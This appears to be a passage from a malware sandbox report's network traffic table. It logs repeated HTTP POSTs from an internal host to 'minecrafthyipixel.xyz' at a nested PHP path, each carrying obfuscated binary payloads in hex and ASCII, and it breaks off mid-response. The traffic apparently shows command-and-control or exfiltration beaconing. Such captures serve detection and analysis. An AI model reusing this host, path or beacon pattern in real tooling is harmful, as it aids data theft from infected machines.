Apr 19, 2024 13:44:24.626636982 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:44:24.730777025 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:24.730927944 CEST | 2512 | OUT | Data Raw: 57 59 5b 5c 59 45 54 5a 5c 5e 59 59 57 56 58 5f 54 5b 5f 56 54 5c 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY[\YETZ\^YYWVX_T[_VT\S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>=68$\$ #^%;-U>8$%<R&]17T)+8?\ <^-%$[. X !
Apr 19, 2024 13:44:24.990322113 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:24 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2ForuPDleb7ChUoIFd4fS8DvwOS4du80YSs4tQSK9yD4%2BIprDHZnAtiJxmeLQWuuc012PQSRoFXH8CMNBI9icsHZ7y2zfXT5u2hR%2FAzuNU%2BowTuaplHrVvAsWUuE4ypC01moNb8eQ%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca47a4aaab02a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:24.990385056 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
175 | 192.168.2.4 | 49929 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:25.215707064 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:25.320271015 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:25.320374012 CEST | 2504 | OUT | Data Raw: 57 5b 5b 5c 59 45 54 5a 5c 5e 59 59 57 57 58 5e 54 55 5f 5e 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[[\YETZ\^YYWWX^TU_^T^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.55;$7$+&=3_&#2=!2*];[",,Z:%$[. X 1
Apr 19, 2024 13:44:25.589507103 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:25 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teQWyI1y%2FXsJw7rh8I0%2BCR%2BftH8fCY6Df3CbxkTrJI%2BsjeXGgp19ulgOQYZGb66OT%2BG75GRKKiHX4t5Hw1%2BshKDAkAOITcRVgES1EAK5Yv1zJtZR2hLljlWaJDmwuz1Ui%2FPQxlGn09k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca47dea24673d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:25.589570045 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
176 | 192.168.2.4 | 49930 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:25.818037987 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:25.925026894 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:25.927653074 CEST | 2512 | OUT | Data Raw: 57 55 5b 5b 59 47 54 58 5c 5e 59 59 57 51 58 5f 54 57 5f 5f 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[[YGTX\^YYWQX_TW__TYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%5(&37382=($1:,U$(.#2!*+7?-5$[. X =
Apr 19, 2024 13:44:26.185456991 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RzoZmGV%2BuBEdMW%2BLO8uWgM5aeT015eSHIS0Z17pT32N%2BSornBBninaLvCR8z8%2FrFVkP1bRK38qIozR%2FIYmoeyhedki8tW4YwNz8IvqhXRssiaHfiGgqmmWk10Pzwq0QfeRjzOx7o8aA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca481bdbd12f5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:26.185483932 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
177 | 192.168.2.4 | 49931 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:26.407507896 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:26.511984110 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:26.512141943 CEST | 2512 | OUT | Data Raw: 52 5e 5b 5e 59 46 51 5f 5c 5e 59 59 57 53 58 5f 54 57 5f 5f 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[^YFQ_\^YYWSX_TW__T_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%2W6]<[' 0$+&=82)+&>#2"*;(7?8\-$[. X 5
Apr 19, 2024 13:44:26.857815027 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BJVvlY5B1BLH2AtA65GYvd0ROUbyp9ueKLL8NU%2BAvxCYftRzi4iU0gg5YGI9tL%2Bt9eztt5LrHk1I6qNRhhKWcuKmNyN51JJRO%2Be4PrkDCABrZq8C2aWLZnpSj%2FfWSioelGn4%2FIo9%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4856e701353-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:26.857877016 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
178 | 192.168.2.4 | 49932 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:27.075130939 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:27.180314064 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:27.180527925 CEST | 2512 | OUT | Data Raw: 57 5d 5e 59 59 4a 54 58 5c 5e 59 59 57 54 58 58 54 52 5f 5e 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^YYJTX\^YYWTXXTR_^TUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'>"; X$''&*+1?%27T1)+^##.$[. X )
Apr 19, 2024 13:44:27.551052094 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jv2hh2uSVz2xGBVZK27HXe0wXkEm9Vds513ZkaK2DYiWxzvBAgEGahP%2Fyqr5RtjCktRyA2X0ga3Tv%2FN57xnY8U2L33B1zlQZu8eOP2m3m69r2dDZ%2BzSE25s93ywFJBbBmWnoZI2wbiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca48989ea7bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:27.551115990 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    179 | 192.168.2.4 | 49933 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:27.781963110 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:27.886681080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:28.146203041 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bda0ipyxL4zmogaliH67%2Fw9ofH1zKbRifzkv4J97ZmQWm%2FsdyvU52yf5P9JIBD6GDxxUNAj5%2B%2BJwuX7eQKHoAzKAjt17o7hj%2BuHjZqN1xCs1XyzivsER1cHbAKXXKEyQCruh02dgLxI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca48dfc4d7cc6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:28.146265984 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    180 | 192.168.2.4 | 49934 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:28.478468895 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:28.748598099 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVupCwameleSlZLj2ePTI0ohpdI3E4OJuN69vskmNcQX1oarNsuDiHlj3Jy3Wd3F%2Bj6N8p%2BcIdJfOQZozQ4io8vh4ja31DcniXHwlIpVFeFIPYonR1C6QYwFDiIDVEuThn13G3jj00s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca491a9af4542-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:28.748665094 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    181 | 192.168.2.4 | 49935 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:29.140885115 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:29.246015072 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    182 | 192.168.2.4 | 49936 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:30.323599100 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2164
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:30.430380106 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:30.797111034 CEST | 770 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1Xh27DUNfD9iPa%2BnXTUqMXwZfqVJz6Zoo6ON4j4cTgA4CizO6xDaB%2BAwArf1Q6ESK%2FuwS%2BUT0wgBs68iVZ2Of2QpLn6VslqeNdA0Lq23L3KKZKhgTJdi9AhamIwrtP2froLL6PJusg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca49ddf996736-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Apr 19, 2024 13:44:30.797194958 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    183 | 192.168.2.4 | 49937 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:30.600650072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:30.868021011 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9Fz2mb%2FuPycaraBFOuMavvdJmJgIZGVDdaVAXII83J096vrPGz%2BpTBanhAXHDMS9rJIGsEJgobxlcZpaT%2B3ZANc82TnKVTlRhw%2Bv4vtjQs%2Bsv4x4s%2Bl6zclkDw5y1i%2FMWYz6ecqT70%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca49ee97cb051-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:30.868082047 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    184 | 192.168.2.4 | 49938 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:31.103835106 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:31.208529949 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:31.475678921 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:31 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cPiI1kOdndiE6rZREa4dQyE07Zs%2B3HY7af0ysLXQ4bpqRkeuRaFIrOXRD9m3QsZYqzWXN9cV12SHAw%2Bhigp3S%2FzmPq9m5MyT0EJKfazHwT3J4AJmbyYlbLR9K5exWrlQntlIwuFcxvo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4a2bfb0672d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:31.475744009 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
185 | 192.168.2.4 | 49939 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:31.702852964 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:44:31.807384968 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:31.807733059 CEST | 2512 | OUT | Data Raw: 57 5f 5e 5c 59 44 54 5e 5c 5e 59 59 57 52 58 5a 54 54 5f 58 54 5f 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^\YDT^\^YYWRXZTT_XT_S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.&U"+3 ;\']"?87Y&,T2]1 ".U++[#,,:%$[. X 1
Apr 19, 2024 13:44:32.171611071 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:32 GMT
